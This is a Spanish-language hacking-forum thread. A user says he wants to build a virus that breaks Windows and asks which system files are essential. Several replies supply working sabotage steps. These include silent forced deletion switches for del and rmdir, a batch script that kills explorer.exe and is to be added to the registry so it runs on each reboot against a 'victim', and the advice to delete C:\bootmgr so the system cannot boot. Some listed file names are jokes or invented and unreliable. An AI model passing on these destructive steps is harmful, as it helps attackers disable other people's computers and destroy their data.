Tema destacado: Recuperar cuenta de Google, GMail, Youtube
Autor
|
Tema: Cuales son los archivos mas importantes de windows (Leído 5,334 veces)
|
agustin_v8
AguSv8
|
quisiera sabes cuales son los archivos mas importantes de windows que sin ese X archivo el sistema dejaria de funcionar.
|
|
|
|
|
|
.:::::::::. AguSv8 .:::::::::. Aguante v8!
|
|
|
|
Kasswed
|
No me quiero ni imaginar para qué quieres saberlo.
|
|
|
|
|
|
"He who allows himself to be insulted, deserves to be." Repórtame cualquier falta a las normas del foro por mensaje privado.
|
|
|
agustin_v8
AguSv8
|
jaja
|
|
|
|
|
|
|
|
|
|
BlackSr
|
C:\Windows\System32\buscaminas.exe
Y aparte de ese creo que si a Win le quitas todos los virus deja de funcionar ya que se compone básicamente de estos xD
Fuera de bromas, con tocar los archivos de arranque que se encuentran en C: (En xp por lo menos) tumbas el Win...Y ahora por curiosidad; para que lo quieres??? xD
|
|
|
|
|
|
|
|
|
|
|
sk8erboi
I love you Avril Lavigne!
|
quisiera sabes cuales son los archivos mas importantes de windows que sin ese X archivo el sistema dejaria de funcionar. eso me huele a plan malevolo 
|
|
|
|
|
|
|
|
|
|
|
EloiDan
|
Yo te lo digo. La carpeta de windows entera, la carpeta de documents and settings también entera, todo lo que haya en la raíz obviamente que no sea texto, video, música o cosas tuyas. Y de la carpeta de Archivos de programa, sólo necesitas de dentro la de Internet Explorer. No ocupa más de 4 Gb aproximadamente. Importante: Tienes que activar la casilla de Ver archivos y carpeta ocultos y desactivar la casilla de ocultar archivos del sistema.
|
|
|
|
|
|
|
|
|
rockernault
Linux User!!!
|
para dejar cojo a Windows:
borra:
pasr.dll
ntldmr.exe
xD.dll
kernell32.dll
fuck.dll
|
|
|
|
|
|
|
|
|
Martin-Ph03n1X
SHOCYRIX
|
Y aparte de ese creo que si a Win le quitas todos los virus deja de funcionar ya que se compone básicamente de estos xD
XD. XDDD.... XXXXXXXXXXDDDDDDDDDDDDDDDDDDDDDDDDDDDD.......
|
|
|
|
|
|
No eres tu trabajo, no eres cuanto tienes en el banco, no eres el auto que conduces, ni el contenido en tu billetera, no eres tus malditos cakis, eres el bailarin cantante del mundo...!!!"  
|
|
|
agustin_v8
AguSv8
|
Respuestas xD :
Kasswed : Si es para hacer un flor de virus que haga ***** windows jaja Blacksr : Pufff dios mio x0ʎu : Como borro la raiz ??? jaja sk8erboi : Si xd jia_wei_zheng : jaja pero el explorer.exe no se puede borrar EloiDan : cuando borras carpetas con MSDOS te pregunta Y/N rockernault : asd ... Martin-Ph03n1X : jajaj
|
|
|
|
|
|
|
|
|
huww
|
cuando borras carpetas con MSDOS te pregunta Y/N Para eso esta el comando /Q /Q Modo silencioso. No pide confirmación. /A Selecciona los archivos que se van a eliminar basandose en atributos. /S Elimina archivos especificados en todos los subdirectorios. /F Fuerza la eliminación de sólo lecturas.
|
|
|
|
|
|
|
|
|
eSETJonathvPc
|
mmm, el no se referia a borrar el explorer.exe, el se referia a crear un bat, que se cree una entrada al registro de win, para k acabe con el proceso del explorador de windows, y dejar la pantalla vacia, aci se ejecutara en cada reinicio, el code pa matar ese proceso es este : ______________________________ @echo off taskkill /t /f /IM explorer.exe ______________________________ lo malo es que si la victima le da la gana de presionar ctrl+alt+supr, y en escoje abrir el administrador de tareas, escoje nueva tarea, escribe explorer, y le da a ejecutar el proceso explorer iniciasra nuevamente, si no lo hace solo le quedara su fondo en la pantalla, jejej y la quera reinicia, y entonces en cada reinicio se kede con su fondo nomas en tonces agrengen el code para agregar nuestro bat al registro, el code ADD REG para agregar al registro tambien lo han de saber, y ha jugar un ratito, xD
|
|
|
|
|
|
|
|
|
pitoloko
|
Para eso esta el comando /Q
Las carpetas no se borran con " Del", sino con RMdir y/o RD
RMDIR [/S] [/Q] [unidad:]ruta RD [/S] [/Q] [unidad:]ruta
/S Quita todos los directorios y archivos del directorio además del mismo directorio. Se usa principalmente cuando se desea quitar un árbol.
/Q Modo silencioso, no pide confirmación para quitar un árbol de directorio con /S
A tu pregunta... si se trata de windows vista o 7, con borrar este archivo (Por ejemplo) sería suficiente: C:\bootmgr Lo considero el archivo más importante, creo que el primer archivo de los que windows carga, sin eso, el sistema no bootea. saludos
|
|
|
|
« Última modificación: 9 Julio 2011, 22:48 por pitoloko »
|
|
pa que
|
|
|
|